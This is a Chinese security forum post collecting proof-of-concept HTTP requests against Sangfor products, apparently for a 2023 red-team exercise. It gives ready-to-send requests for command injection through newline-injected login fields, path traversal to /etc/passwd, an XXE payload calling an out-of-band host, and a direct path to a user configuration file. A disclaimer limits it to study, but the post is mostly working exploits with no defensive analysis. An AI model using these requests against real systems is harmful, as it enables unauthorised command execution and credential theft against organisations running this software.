DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 免杀
查看: 1728|回复: 0

[2023HW] 深信服漏洞 PoC 整理

[复制链接]

172

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
339
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-8-16 21:49:23 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

深信服报表系统任意命令执行漏洞版本有限制


POC

  1. POST /rep/login HTTP/1.1
  2. Host: URL
  3. Cookie:
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0
  5. Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
  6. Accept-Encoding: gzip deflate
  7. Upgrade-Insecure-Requests: 1
  8. Sec-Fetch-Dest: document
  9. Sec-Fetch-Mode: navigate
  10. Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers
  11. Connection: close
  12. Content-Type:application/x-www-form-urlencoded
  13. Content-Length: 126

  14. clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
复制代码

深信服报表任意读取


  1. GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
  2. Host: xx.xx.xx.xx:85
  3. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  4. Accept: */*
  5. Connection: Keep-Alive
复制代码

深信服数据中心管理系统 XML 实体注入漏洞


  1. GET /src/sangforindex HTTP/1.1
  2. Host: ip:port
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)
  5. Accept:
  6. text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Content-Type: text/xml
  8. Accept-Encoding: gzip, deflate, br
  9. Accept-Language: zh-CN,zh;q=0.9
  10. Connection: Keep-alive
  11. Content-Length: 135

  12. <?xml version="1.0" encoding="utf-8" ?><!DOCTYPE root [
  13. <!ENTITY rootas SYSTEM "http://dnslog">
  14. ]>
  15. <xxx>
  16. &rootas;
  17. </xxx>
复制代码

深信服应用交付系统敏感信息泄露


  1. xxx.xxx.xxx.xxx:port/tmp/updateme/sinfor/ad/sys/sys_user.conf
复制代码

深信服应用交付系统命令执行漏洞


  1. POST /rep/login
  2. Host:xxx.xxx.xxx.xxx:port

  3. clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-4-30 03:54 , Processed in 0.057427 second(s), 25 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表